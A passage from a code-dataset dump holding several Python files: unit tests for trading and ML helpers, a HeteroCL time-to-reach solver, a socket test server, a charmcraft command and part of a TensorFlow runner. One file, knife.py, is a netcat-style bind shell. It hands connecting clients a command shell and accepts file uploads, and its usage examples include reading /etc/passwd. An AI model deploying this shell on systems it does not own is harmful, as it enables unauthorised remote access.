list)\n assert len(positions) == len(mock_positions)\n\n\ndef test_get_position_symbols(mocker, mock_positions):\n # patches\n mocker.patch(\n \"trading_scripts.utils.helpers.Cache.API_CLIENT.list_positions\",\n return_value=mock_positions,\n )\n\n positions = get_position_symbols()\n assert isinstance(positions, list)\n assert len(positions) == len(mock_positions)\n assert isinstance(positions[0], str)\n assert positions[0] == mock_positions[0].symbol\n\n\ndef test_get_last_quote(mocker, mock_barset):\n mocker.patch(\n \"trading_scripts.utils.helpers.Cache.API_CLIENT.get_barset\",\n return_value=mock_barset,\n )\n last_quote = get_last_quote(\"AAPL\")\n assert isinstance(last_quote, float)\n assert last_quote == 146.16\n\n\ndef test_get_trailing_stop_orders(mocker, mock_orders):\n def get_mock_orders(symbols=[], **kwargs):\n output = []\n for order in mock_orders:\n if order.symbol in symbols:\n output.append(order)\n return output\n\n mock_list_orders = mocker.patch(\n \"trading_scripts.utils.helpers.Cache.API_CLIENT.list_orders\",\n side_effect=get_mock_orders,\n )\n trailing_stop_orders = get_trailing_stop_orders(\"AAPL\")\n\n mock_list_orders.assert_called_once()\n assert isinstance(trailing_stop_orders, list)\n assert len(trailing_stop_orders) == 1\n assert trailing_stop_orders[0].symbol == \"AAPL\"\n\n\ndef test_get_historical_data(mocker, mock_historical_data):\n mocked_method = mocker.patch.object(\n yf.Ticker, \"history\", return_value=mock_historical_data\n )\n response = get_historical_data(\"AAPL\")\n assert isinstance(response, pd.DataFrame)\n mocked_method.assert_called_once_with(interval=\"1d\", period=\"3y\")\n columns = [\"Open\", \"High\", \"Low\", \"Close\", \"Volume\", \"Dividends\", \"Stock Splits\"]\n for column in columns:\n assert response[column] is not None\n\n\ndef test_get_account(mocker, mock_account):\n mocker.patch(\n 
\"trading_scripts.utils.helpers.Cache.API_CLIENT.get_account\",\n return_value=mock_account,\n )\n account = get_account()\n assert account.id == \"fake-account-id\"\n assert account.cash == \"10000.00\"\n\n\n@patch(\"os.getenv\")\n@patch(\"sys.exit\")\ndef test_validate_env_vars(mock_exit, mock_getenv):\n validate_env_vars()\n assert mock_getenv.call_count == 2\n mock_exit.assert_not_called()\n\n\ndef test_validate_env_vars_exit(mocker):\n mocked_logger_error = mocker.patch(\"loguru.logger.error\")\n mock_exit = mocker.patch(\"sys.exit\")\n mocker.patch(\"os.getenv\", return_value=False)\n\n validate_env_vars()\n mock_exit.assert_called_with(1)\n mocked_logger_error.assert_called()\n\n\ndef test_is_market_open(mocker, mock_get_clock):\n mocker.patch(\n \"trading_scripts.utils.helpers.Cache.API_CLIENT.get_clock\",\n return_value=mock_get_clock,\n )\n is_open = is_market_open()\n assert is_open\n","sub_path":"tests/test_helpers.py","file_name":"test_helpers.py","file_ext":"py","file_size_in_byte":5283,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"280741341","text":"\"\"\"\n@author: David Diaz Vico\n\"\"\"\n\nfrom predictor.train import train\nfrom predictor.estimator.estimator import ClassifierBuilder\nfrom sklearn.datasets import load_iris\nfrom sklearn.dummy import DummyClassifier\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.preprocessing import StandardScaler\n\n\nclass DummyClassifierBuilder(ClassifierBuilder):\n\n @staticmethod\n def space(**kwargs):\n return {'strategy': {'most_frequent': None, 'uniform': None}}\n\n @staticmethod\n def build(**kwargs):\n return DummyClassifier(**kwargs)\n\n\ndef test_train():\n data = load_iris()\n predictor, metaparams, metrics = train(\n builder=DummyClassifierBuilder,\n x=data.data,\n y=data.target,\n transformers=[StandardScaler()]\n )\n assert(isinstance(predictor, Pipeline))\n assert(isinstance(metaparams, dict))\n assert(len(metaparams) == 1)\n assert('strategy' in metaparams)\n assert(metaparams['strategy'] in ('most_frequent', 'uniform'))\n assert(isinstance(metrics, dict))\n assert(len(metrics) == 1)\n assert(isinstance(metrics['accuracy_score'], float))\n assert(0.0 <= metrics['accuracy_score'] <= 1.0)\n\n\ndef test_train_initargs():\n data = load_iris()\n predictor, metaparams, metrics = train(\n builder=DummyClassifierBuilder,\n x=data.data,\n y=data.target,\n transformers=[StandardScaler()],\n init_args={'strategy': 'uniform'}\n )\n assert(isinstance(predictor, Pipeline))\n assert(isinstance(metaparams, dict))\n assert(len(metaparams) == 0)\n assert(isinstance(metrics, dict))\n assert(len(metrics) == 1)\n assert(isinstance(metrics['accuracy_score'], float))\n assert(0.0 <= metrics['accuracy_score'] <= 1.0)\n","sub_path":"tests/test_train.py","file_name":"test_train.py","file_ext":"py","file_size_in_byte":1726,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"539822234","text":"import getopt\r\nimport sys\r\nimport socket\r\nimport subprocess\r\nimport threading\r\nlisten=False\r\ncommand=False\r\nupload=False\r\nexecute=\"\"\r\ntarget=\"\"\r\nupload_destination=\"\"\r\nport=0\r\n\r\ndef client_handler(client_socket):\r\n global upload\r\n global execute\r\n global command\r\n if len(upload_destination):\r\n file_buffer=\"\"\r\n while True:\r\n data=client_socket.recv(1024)\r\n if not data:\r\n break\r\n else:\r\n file_buffer+=data\r\n try:\r\n file_descriptor=open(upload_destination,'wb')\r\n 
file_descriptor.write(file_buffer)\r\n file_descriptor.close()\r\n client_socket.send(\"Successfully saved file to \"+upload_destination)\r\n except:\r\n client_socket.send(\"Failed to save file to \"+upload_destination)\r\n if len(execute):\r\n output=run_command(execute)\r\n client_socket.send(output)\r\n if command:\r\n while True:\r\n client_socket.send(\"Tiger\")\r\n cmd_buffer=\"\"\r\n while \"\\n\" not in cmd_buffer:\r\n cmd_buffer+=client_socket.recv(1024)\r\n response=run_command(cmd_buffer)\r\n client_socket.send(response)\r\n\r\ndef run_command(command):\r\n command=command.rstrip()\r\n try:\r\n output=subprocess.check_output(command,stderr=subprocess.STDOUT,shell=True)\r\n except:\r\n output=\"Failed to execute command.\\r\\n\"\r\n return output\r\n\r\ndef server_loop():\r\n global target\r\n if not len(target):\r\n target=\"0.0.0.0\"\r\n server=socket.socket(socket.AF_INET,socket.SOCK_STREAM)\r\n server.bind((target,port))\r\n server.listen(5)\r\n while True:\r\n client_socket,addr=server.accept()\r\n client_thread=threading.Thread(target=client_handler,args=(client_socket,))\r\n client_thread.start()\r\n\r\ndef client_sender(buffer):\r\n client=socket.socket(socket.AF_INET,socket.SOCK_STREAM)\r\n try:\r\n client.connect((target,port))\r\n if len(buffer):\r\n client.send(buffer)\r\n while True:\r\n recv_len=1\r\n response=\"\"\r\n while recv_len:\r\n data=client.recv(4096)\r\n recv_len=len(data)\r\n response+=data\r\n if recv_len <4096:\r\n break\r\n print(response)\r\n\r\n buffer=input(\"\")\r\n buffer+=\"\\n\"\r\n client.send(buffer)\r\n except:\r\n print(\"Some error occured.\")\r\n client.close()\r\ndef usage():\r\n print('''\r\n |*****************************|\r\n | CoDeD By: |\r\n | Batukeshwar |\r\n | Vats |\r\n |*****************************|\r\n ''')\r\n print(\"Usage: knife.py -t target_host -p port\")\r\n print(\"-l --listen -listen on [host]:[port] for incoming connections.\")\r\n print(\"-e --execute = file_to_run -execute the given file upon receiving a connections.\")\r\n print(\"-c command -intitiallze a command shell\")\r\n print(\"-u --upload=destination -upon recieving a connection upload the file to the specified location.\")\r\n print(\"Examples:\")\r\n print(\"knife.py -t 192.168.0.1 -p 5555 -l -c\")\r\n print(\"knife.py -t 192.168.0.1 -p 5555 -l -u=c:\\\\target.exe\")\r\n print(\"knife.py -t 192.168.0.1 -p 5555 -l -e=\\\"cat /etc/passwd\\\"\")\r\n print(\"echo 'ABCDEFGHI | ./netcat.py -t 192.168.11.12 -p 135\")\r\n\r\ndef main():\r\n global execute\r\n global target\r\n global port\r\n global listen\r\n global command\r\n global upload_destination\r\n\r\n #if no arguments are given.\r\n if not len(sys.argv[1:]):\r\n usage()\r\n\r\n #Reading arguments if given. 
\r\n try:\r\n opts, args=getopt.getopt(sys.argv[1:],\"hle:t:p:cu:\",[\"help\",\"listen\",\"execute\",\"target\",\"port\",\"command\",\"upload\"])\r\n\r\n except getopt.GetoptError as err:\r\n print(str(err))\r\n usage()\r\n\r\n for o,a in opts:\r\n print(o)#o tells us about arguments\r\n #a tells us about values of those arguments\r\n print(a)\r\n if o in (\"-h\",\"--help\"):\r\n usage()\r\n elif o in (\"-l\",\"--listen\"):\r\n listen=True\r\n elif o in (\"-e\",\"--execute\"):\r\n execute=a\r\n elif o in (\"-c\",\"--commandshell\"):\r\n command=True\r\n elif o in (\"-u\",\"--upload\"):\r\n upload_destination=a\r\n elif o in (\"-t\",\"--target\"):\r\n target=a\r\n elif o in (\"-p\",\"--port\"):\r\n port=int(a)\r\n else:\r\n assert False,\"Unexpected input.\"\r\n\r\n if not listen and len(target) and port>0:\r\n buffer=sys.stdin.read()\r\n client_sender(buffer)\r\n if listen:\r\n server_loop()\r\nmain()\r\n","sub_path":"knife.py","file_name":"knife.py","file_ext":"py","file_size_in_byte":4779,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"101695898","text":"import heterocl as hcl\nimport numpy as np\nimport time\nimport os\nfrom computeGraphs.graph_3D import *\n\n# Update the phi function at position (i,j,k)\ndef updatePhi(i, j, k, my_object, phi, g, x1, x2, x3):\n dV_dx1_L = hcl.scalar(0, \"dV_dx1_L\")\n dV_dx1_R = hcl.scalar(0, \"dV_dx1_R\")\n dV_dx1 = hcl.scalar(0, \"dV_dx1\")\n dV_dx2_L = hcl.scalar(0, \"dV_dx2_L\")\n dV_dx2_R = hcl.scalar(0, \"dV_dx2_R\")\n dV_dx2 = hcl.scalar(0, \"dV_dx2\")\n dV_dx3_L = hcl.scalar(0, \"dV_dx3_L\")\n dV_dx3_R = hcl.scalar(0, \"dV_dx3_R\")\n dV_dx3 = hcl.scalar(0, \"dV_dx3\")\n\n sigma1 = hcl.scalar(0, \"sigma1\")\n sigma2 = hcl.scalar(0, \"sigma2\")\n sigma3 = hcl.scalar(0, \"sigma3\")\n\n # dV_dx_L[0], dV_dx_R[0] = spa_derivX(i, j, k)\n dV_dx1_L[0], dV_dx1_R[0] = spa_derivX(i, j, k, phi, g)\n dV_dx2_L[0], dV_dx2_R[0] = spa_derivY(i, j, k, phi, g)\n dV_dx3_L[0], dV_dx3_R[0] = spa_derivT(i, j, k, phi, g)\n\n # Calculate average gradient\n dV_dx1[0] = (dV_dx1_L[0] + dV_dx1_R[0]) / 2\n dV_dx2[0] = (dV_dx2_L[0] + dV_dx2_R[0]) / 2\n dV_dx3[0] = (dV_dx3_L[0] + dV_dx3_R[0]) / 2\n\n # Find the optimal control through my_object's API\n uOpt = my_object.opt_ctrl(0, (x1[i], x2[j], x3[k]),\n (dV_dx1[0], dV_dx2[0], dV_dx3[0]))\n dOpt = my_object.optDstb(0, (x1[i], x2[j], x3[k]),\n (dV_dx1[0], dV_dx2[0], dV_dx3[0]))\n\n # Calculate dynamical rates of changes\n dx1_dt, dx2_dt, dx3_dt = my_object.dynamics(0, (x1[i], x2[j], x3[k]), uOpt, dOpt)\n\n H = hcl.scalar(0, \"H\")\n phiNew = hcl.scalar(0, \"phiNew\")\n diss1 = hcl.scalar(0, \"diss1\")\n diss2 = hcl.scalar(0, \"diss2\")\n diss3 = hcl.scalar(0, \"diss3\")\n\n # Calculate Hamiltonian terms:\n H[0] = (-(dx1_dt * dV_dx1[0] + dx2_dt * dV_dx2[0] + dx3_dt * dV_dx3[0] + 1))\n\n # Calculate the \"dissipation\"\n sigma1[0] = my_abs(dx1_dt)\n sigma2[0] = my_abs(dx2_dt)\n sigma3[0] = my_abs(dx3_dt)\n c = hcl.scalar(0, \"c\")\n c[0] = sigma1[0] / g.dx[0] + sigma2[0] / g.dx[1] + sigma3[0] / g.dx[2]\n\n diss1[0] = sigma1[0] * ((dV_dx1_R[0] - dV_dx1_L[0]) / 2 + phi[i, j, k] / g.dx[0])\n diss2[0] = sigma2[0] * ((dV_dx2_R[0] - dV_dx2_L[0]) / 2 + phi[i, j, k] / g.dx[1])\n diss3[0] = sigma3[0] * ((dV_dx3_R[0] - dV_dx3_L[0]) / 2 + phi[i, j, k] / g.dx[2])\n\n # New phi\n phiNew[0] = (-H[0] + diss1[0] + diss2[0] + diss3[0]) / c[0]\n #debugger[i,j,k] = phiNew[0]\n phi[i, j, k] = my_min(phi[i, j ,k], phiNew[0])\n\ndef EvalBoundary(phi, g):\n if 0 not in g.pDim:\n with hcl.for_(0, 
phi.shape[1], name=\"j\") as j:\n with hcl.for_(0, phi.shape[2], name=\"k\") as k:\n #debug2[0] = j\n tmp1 = hcl.scalar(0, \"tmp1\")\n tmp1[0] = 2 * phi[1, j, k] - phi[2, j, k]\n tmp1[0] = my_max(tmp1[0], phi[2, j, k])\n phi[0, j, k] = my_min(tmp1[0], phi[0, j, k])\n\n tmp2 = hcl.scalar(0, \"tmp2\")\n tmp2[0] = 2 * phi[phi.shape[0] - 2, j, k] - phi[phi.shape[0] - 3, j, k]\n tmp2[0] = my_max(tmp2[0], phi[phi.shape[0] - 3, j, k])\n phi[phi.shape[0] - 1, j, k] = my_min(tmp2[0], phi[phi.shape[0] - 1, j, k])\n\n if 1 not in g.pDim:\n with hcl.for_(0, phi.shape[0], name=\"i\") as i:\n with hcl.for_(0, phi.shape[2], name=\"k\") as k:\n tmp1 = hcl.scalar(0, \"tmp1\")\n tmp1[0] = 2 * phi[i, 1, k] - phi[i, 2, k]\n tmp1[0] = my_max(tmp1[0], phi[i, 2, k])\n phi[i, 0, k] = my_min(tmp1[0], phi[i, 0, k])\n\n tmp2 = hcl.scalar(0, \"tmp2\")\n tmp2[0] = 2 * phi[i, phi.shape[1] - 2, k] - phi[i, phi.shape[1] - 3, k]\n tmp2[0] = my_max(tmp2[0], phi[i, phi.shape[1] - 3, k])\n phi[i, phi.shape[1] - 1, k] = my_min(tmp2[0], phi[i, phi.shape[1] - 1, k])\n\n if 2 not in g.pDim:\n with hcl.for_(0, phi.shape[0], name=\"i\") as i:\n with hcl.for_(0, phi.shape[1], name=\"j\") as j:\n tmp1 = hcl.scalar(0, \"tmp1\")\n tmp1[0] = 2 * phi[i, j, 1] - phi[i, j, 2]\n tmp1[0] = my_max(tmp1[0], phi[i, j, 2])\n phi[i, j, 0] = my_min(tmp1[0], phi[i, j, 0])\n\n tmp2 = hcl.scalar(0, \"tmp2\")\n tmp2[0] = 2 * phi[i, j, phi.shape[2] - 2] - phi[i, j, phi.shape[2] - 3]\n tmp2[0] = my_max(tmp2[0], phi[i, j, phi.shape[2] - 3])\n phi[i, j, phi.shape[2] - 1] = my_min(tmp2[0], phi[i, j, phi.shape[2] - 1])\n\n\n# Returns 0 if convergence has been reached\ndef evaluateConvergence(newV, oldV, epsilon, reSweep):\n delta = hcl.scalar(0, \"delta\")\n # Calculate the difference, if it's negative, make it positive\n delta[0] = newV[0] - oldV[0]\n with hcl.if_(delta[0] < 0):\n delta[0] = delta[0] * -1\n with hcl.if_(delta[0] > epsilon[0]):\n reSweep[0] = 1\n\n######################################### TIME-TO-REACH COMPUTATION ##########################################\n\ndef TTR_3D(my_object, g):\n def solve_phiNew(phi, x1, x2, x3):\n l_i = 0 if 0 in g.pDim else 1\n h_i = phi.shape[0] if 0 in g.pDim else phi.shape[0] - 1\n l_j = 0 if 1 in g.pDim else 1\n h_j = phi.shape[1] if 1 in g.pDim else phi.shape[1] - 1\n l_k = 0 if 2 in g.pDim else 1\n h_k = phi.shape[2] if 2 in g.pDim else phi.shape[2] - 1\n # Perform value iteration by sweeping in direction 1\n with hcl.Stage(\"Sweep_1\"):\n with hcl.for_(l_i, h_i, name=\"i\") as i:\n with hcl.for_(l_j, h_j, name=\"j\") as j:\n with hcl.for_(l_k, h_k, name=\"k\") as k:\n updatePhi(i, j, k, my_object, phi, g, x1, x2, x3)\n # debug2[0] = j\n EvalBoundary(phi, g)\n\n # Perform value iteration by sweeping in direction 2\n with hcl.Stage(\"Sweep_2\"):\n with hcl.for_(l_i, h_i, name=\"i\") as i:\n with hcl.for_(l_j, h_j, name=\"j\") as j:\n with hcl.for_(l_k, h_k, name=\"k\") as k:\n i2 = phi.shape[0] - i - 1\n j2 = phi.shape[1] - j - 1\n k2 = phi.shape[2] - k - 1\n updatePhi(i2, j2, k2, my_object, phi, g, x1, x2, x3)\n EvalBoundary(phi, g)\n\n # Perform value iteration by sweeping in direction 3\n with hcl.Stage(\"Sweep_3\"):\n with hcl.for_(l_i, h_i, name=\"i\") as i:\n with hcl.for_(l_j, h_j, name=\"j\") as j:\n with hcl.for_(l_k, h_k, name=\"k\") as k:\n j2 = phi.shape[1] - j - 1\n k2 = phi.shape[2] - k - 1\n updatePhi(i, j2, k2, my_object, phi, g, x1, x2, x3)\n EvalBoundary(phi, g)\n\n\n # Perform value iteration by sweeping in direction 4\n with hcl.Stage(\"Sweep_4\"):\n with hcl.for_(l_i, h_i, name=\"i\") as 
i:\n with hcl.for_(l_j, h_j, name=\"j\") as j:\n with hcl.for_(l_k, h_k, name=\"k\") as k:\n i2 = phi.shape[0] - i - 1\n j2 = phi.shape[1] - j - 1\n updatePhi(i2, j2, k, my_object, phi, g, x1, x2, x3)\n EvalBoundary(phi, g)\n\n # Perform value iteration by sweeping in direction 5\n with hcl.Stage(\"Sweep_5\"):\n with hcl.for_(l_i, h_i, name=\"i\") as i:\n with hcl.for_(l_j, h_j, name=\"j\") as j:\n with hcl.for_(l_k, h_k, name=\"k\") as k:\n i2 = phi.shape[0] - i - 1\n k2 = phi.shape[2] - k - 1\n updatePhi(i2, j, k2, my_object, phi, g, x1, x2, x3)\n EvalBoundary(phi, g)\n\n\n # Perform value iteration by sweeping in direction 6\n with hcl.Stage(\"Sweep_6\"):\n with hcl.for_(l_i, h_i, name=\"i\") as i:\n with hcl.for_(l_j, h_j, name=\"j\") as j:\n with hcl.for_(l_k, h_k, name=\"k\") as k:\n i2 = phi.shape[0] - i - 1\n updatePhi(i2, j, k, my_object, phi, g, x1, x2, x3)\n EvalBoundary(phi, g)\n\n # Perform value iteration by sweeping in direction 7\n with hcl.Stage(\"Sweep_7\"):\n with hcl.for_(l_i, h_i, name=\"i\") as i:\n with hcl.for_(l_j, h_j, name=\"j\") as j:\n with hcl.for_(l_k, h_k, name=\"k\") as k:\n j2 = phi.shape[1] - j - 1\n updatePhi(i, j2, k, my_object, phi, g, x1, x2, x3)\n EvalBoundary(phi, g)\n\n # Perform value iteration by sweeping in direction 8\n with hcl.Stage(\"Sweep_8\"):\n with hcl.for_(l_i, h_i, name=\"i\") as i:\n with hcl.for_(l_j, h_j, name=\"j\") as j:\n with hcl.for_(l_k, h_k, name=\"k\") as k:\n k2 = phi.shape[2] - k - 1\n updatePhi(i, j, k2, my_object, phi, g, x1, x2, x3)\n EvalBoundary(phi, g)\n\n ###################################### SETUP PLACEHOLDERS ######################################\n \n # Initialize the HCL environment\n hcl.init()\n hcl.config.init_dtype = hcl.Float()\n\n # Positions vector\n x1 = hcl.placeholder((g.pts_each_dim[0],), name=\"x1\", dtype=hcl.Float())\n x2 = hcl.placeholder((g.pts_each_dim[1],), name=\"x2\", dtype=hcl.Float())\n x3 = hcl.placeholder((g.pts_each_dim[2],), name=\"x3\", dtype=hcl.Float())\n phi = hcl.placeholder(tuple(g.pts_each_dim), name=\"phi\", dtype=hcl.Float())\n #debugger = hcl.placeholder(tuple(g.pts_each_dim), name=\"debugger\", dtype=hcl.Float())\n #debug2 = hcl.placeholder((0,), \"debug2\")\n\n # Create a static schedule -- graph\n s = hcl.create_schedule([phi, x1, x2, x3], solve_phiNew)\n\n # Build an executable and return\n return hcl.build(s)\n","sub_path":"TimeToReach/TimeToReach_3D.py","file_name":"TimeToReach_3D.py","file_ext":"py","file_size_in_byte":10084,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"190857009","text":"#! 
/usr/bin/env python\n# -*- coding: utf-8 -*-\n# vim:fenc=utf-8\n# Last modified: 2016-09-02 17:10:56\n\nimport socket\n# import da\nimport sys\nimport send\nimport logging\nimport os\n\n\ndef string_parser(sockfd, src, p):\n    if src == \"connect\":\n        logging.debug(\"connect\")\n    elif src == \"disconnect\":\n        logging.debug(\"disconnect\")\n    elif src == \"reset\":\n        logging.debug(\"reset\")\n    elif src == \"pause\":\n        logging.debug(\"pause\")\n    elif src == \"resume\":\n        logging.debug(\"resume\")\n    elif src == \"cancel\":\n        logging.debug(\"cancel\")\n    elif src == \"home\":\n        logging.debug(\"home\")\n    elif src == \"send_now\":\n        logging.debug(\"send_now\")\n    elif src == \"startprint\":\n        logging.debug(\"startprint\")\n    else:\n        logging.warning(\"no command\")\n    return p\n\n\ndef main():\n    try:\n        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n    except socket.error:\n        logging.debug(\"socket error\")\n        sys.exit(1)\n\n    port = 8888\n    host = ''  # Symbolic name meaning all available interfaces\n    sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)  # reuse tcp\n    sock.bind((host, port))\n    sock.listen(5)\n    # sock.settimeout(10)\n\n    p = None\n    try:\n        while True:\n            logging.debug(\"server accept\")\n            (csock, adr) = sock.accept()\n            print(\"Client Info: \", csock, adr)\n            # recv() returns bytes in Python 3; decode and strip the line ending\n            # before comparing against the command strings.\n            src = csock.recv(1024).decode().strip()\n            if not src:\n                pass\n            else:\n                p = string_parser(csock, src, p)\n                print(\"Client send: \" + src)\n            csock.send(b\"Hello I'm Server.\\r\\n\")\n    except KeyboardInterrupt:\n        print(\"KeyboardInterrupt! Stop server\")\n        csock.close()\n        sys.exit(0)\n    finally:\n        csock.close()\n\nif __name__ == \"__main__\":\n    main()\n","sub_path":"src/python/test_server.py","file_name":"test_server.py","file_ext":"py","file_size_in_byte":1826,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
{"seq_id":"364824793","text":"# Copyright 2021 Canonical Ltd.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n# For further info, check https://github.com/canonical/charmcraft\n\n\"\"\"Infrastructure for the 'clean' command.\"\"\"\n\nimport logging\n\nfrom charmcraft.cmdbase import BaseCommand\nfrom charmcraft.metadata import parse_metadata_yaml\nfrom charmcraft.providers import get_provider\n\nlogger = logging.getLogger(__name__)\n\n_overview = \"\"\"\nPurge Charmcraft project's artifacts, including:\n\n- LXD Containers created for building charm(s)\n\"\"\"\n\n\nclass CleanCommand(BaseCommand):\n    \"\"\"Clean project artifacts.\"\"\"\n\n    name = \"clean\"\n    help_msg = \"Purge project artifacts\"\n    overview = _overview\n    common = True\n\n    def run(self, parsed_args):\n        \"\"\"Run the command.\"\"\"\n        project_path = self.config.project.dirpath\n        metadata = parse_metadata_yaml(project_path)\n        logger.debug(\"Cleaning project %r.\", metadata.name)\n\n        provider = get_provider()\n        provider.clean_project_environments(charm_name=metadata.name, project_path=project_path)\n        logger.info(\"Cleaned project %r.\", 
metadata.name)\n","sub_path":"charmcraft/commands/clean.py","file_name":"clean.py","file_ext":"py","file_size_in_byte":1595,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"608328125","text":"import os\nimport threading\n\nimport numpy as np\nimport tensorflow as tf\n\nimport utils\nfrom mlp.fcn import FCN\nfrom stratify import StratifiedShuffle\n\n\nclass FCNRunner:\n \"\"\"\n This class acts as a factory and controller for fcn.py\n FullyConnectedNet builds a tensorflow graph that represents the NN and its evaluation ops.\n FCNRunner uses the FullyConnectedNet graph to build two other graphs: one for training and one for validation.\n A good thing is that both the training and testing graphs share the same variables (https://www.tensorflow.org/versions/r0.11/how_tos/variable_scope/index.html)\n So there is no memory duplication of parameters, or duplication of the process of building up the NN twice.\n +----------------------------------------------------------------------------+\n | training |\n | data |\n | pipeline |\n | + +----------+ |\n | +----> | Fully +-------> train_loss, train_accuracy, optimization_op |\n | | Connected| |\n | +----> | Net +-------> validation_loss, validation_accuracy |\n | + +----------+ |\n | validation |\n | data |\n | pipeline |\n +----------------------------------------------------------------------------+\n The training output ops (train_loss, etc...) are only concerned with applying the FCN to the training data.\n The validation output ops (validation_loss, etc...) are only concerned with applying the FCN to the validation data.\n \"\"\"\n\n def __init__(self, config, params):\n\n self.config = config\n\n # config:\n self.log_folder = config.get_rel_path(\"PATHS\", \"log_folder\")\n self.experiment_ID = config.get(\"PROCESS\", \"experiment_ID\") or utils.date_time_string()\n self.max_checkpoints = config.getint(\"PROCESS\", \"max_checkpoints\") or 5\n self.validation_interval = config.getint(\"PROCESS\", \"validation_interval\", fallback=15)\n # self.keep_prob = config.getfloat(\"TRAINING\", \"dropout_keep_probability\", fallback=1.0)\n self.keep_prob = params['dropout_keep_probability']\n self.num_epochs = config.getint(\"TRAINING\", \"num_epochs\", fallback=0)\n self.batch_size = params['batch_size']\n\n self.network = FCN(config, params)\n self.validation_window = params['validation_window']\n self.val_check_after = config.getint(\"PROCESS\", \"val_check_after\", fallback=1000)\n\n def bind_training_dataqueue_dataframe(self, train_data_cols, params):\n config = self.config\n\n # train_batch_size = config.getint(\"TRAINING\", \"batch_size\")\n train_batch_size = params['batch_size']\n with tf.name_scope(\"Train\"):\n self.network.bind_graph_dataframe(\"TRAIN\", train_data_cols,\n train_batch_size,\n reuse=False,\n with_training_op=True)\n self.train_op = self.network.train_op\n self.train_loss = self.network.loss\n self.train_str_accu = self.network.streaming_accu_op\n self.train_accuracy = self.network.accuracy\n if self.network.ground_truth_slicer is not None:\n self.train_auc = self.network.auc\n\n self.train_summaries_merged = self.network.get_summaries()\n\n def bind_validation_dataqueue_dataframe(self, valid_data_cols):\n config = self.config\n\n # now reuse the graph to bind new OPs that handle the validation data:\n valid_batch_size = config.getint(\"TRAINING\", \"validation_batch_size\")\n with tf.name_scope(\"Valid\"):\n self.network.bind_graph_dataframe(\"VALID\", valid_data_cols, 
valid_batch_size, reuse=True,\n                                              with_training_op=False)\n            self.valid_loss = self.network.loss\n            self.valid_str_accu = self.network.streaming_accu_op\n            self.valid_accuracy = self.network.accuracy\n            if self.network.ground_truth_slicer is not None:\n                self.valid_auc = self.network.auc\n\n            self.valid_summaries_merged = self.network.get_summaries()\n\n    def bind_test_dataqueue_dataframe(self, test_data_cols):\n        config = self.config\n\n        # now reuse the graph to bind new OPs that handle the test data:\n        test_batch_size = config.getint(\"TEST\", \"batch_size\")\n        with tf.name_scope(\"Test\"):\n            self.network.bind_graph_dataframe(\"TEST\", test_data_cols, test_batch_size, reuse=True,\n                                              with_training_op=False)\n            self.test_loss = self.network.loss\n            self.test_str_accu = self.network.streaming_accu_op\n            self.test_accuracy = self.network.accuracy\n            self.test_summaries_merged = self.network.get_summaries()\n            self.test_predictions = self.network.predictions\n            self.test_pred_path = config.get_rel_path(\"TEST\", \"write_predictions_to\")\n\n    def initialize(self):\n        config = self.config\n        self.session = tf.Session()\n\n        self.checkpoint_every = config.getint(\"PROCESS\", \"checkpoint_every\")\n        self.checkpoint_path = config.get_rel_path(\"PATHS\", \"checkpoint_dir\") + \"/training.ckpt\"\n\n        load_checkpoint = config.get(\"PROCESS\", \"initialize_with_checkpoint\") or None\n        if load_checkpoint:\n            self.load_checkpoint(load_checkpoint)\n        else:\n            self.saver = tf.train.Saver(tf.global_variables(), max_to_keep=self.max_checkpoints)\n\n        if config.getint(\"TRAINING\", \"num_epochs\") > 0:\n            self.session.run(tf.global_variables_initializer())\n\n        self.session.run(tf.local_variables_initializer())  # for streaming metrics\n\n        self.create_summary_writers()\n\n        # TODO: No need for queue_runners anymore\n        # coord = tf.train.Coordinator()\n        # tf.train.start_queue_runners(sess=self.session, coord=coord)\n        # start_queue_runners has to be called for any Tensorflow graph that uses queues.\n\n        tensorboard_thread = threading.Thread(target=self.start_tensorboard, args=())\n        tensorboard_thread.start()\n\n    def create_summary_writers(self):\n\n        if hasattr(self, \"train_summaries_merged\"):\n            self.train_summary_writer = tf.summary.FileWriter(\"%s/%s_train\" % (self.log_folder, self.experiment_ID),\n                                                              self.session.graph)\n\n        if hasattr(self, \"valid_summaries_merged\"):\n            self.valid_summary_writer = tf.summary.FileWriter(\"%s/%s_valid\" % (self.log_folder, self.experiment_ID))\n\n        if hasattr(self, \"test_summaries_merged\"):\n            self.test_summary_writer = tf.summary.FileWriter(\"%s/%s_test\" % (self.log_folder, self.experiment_ID))\n\n    def close_session(self):\n        self.session.close()\n\n    def test(self, test_features, test_labels):\n        pass\n\n    def train_once_dataframe(self, epoch, i, input_batch, label_batch, reg_label_batch):\n        feed_dict = {self.network.keep_prob: self.keep_prob,\n                     self.network.is_training: True,\n                     self.network.input_features_placeholder: input_batch}\n        tensors = [self.train_op, self.train_loss, self.train_summaries_merged, self.train_accuracy,\n                   self.train_str_accu]\n\n        if label_batch is not None:\n            feed_dict.update({self.network.input_label_placeholder: label_batch})\n            tensors.append(self.train_auc)\n            _, train_loss, training_summary, training_accuracy, train_streaming_accuracy, train_auc = self.session.run(\n                tensors, feed_dict=feed_dict)\n\n        if reg_label_batch is not None:\n            feed_dict.update({self.network.reg_input_placeholder: reg_label_batch})\n            _, train_loss, training_summary, training_accuracy, 
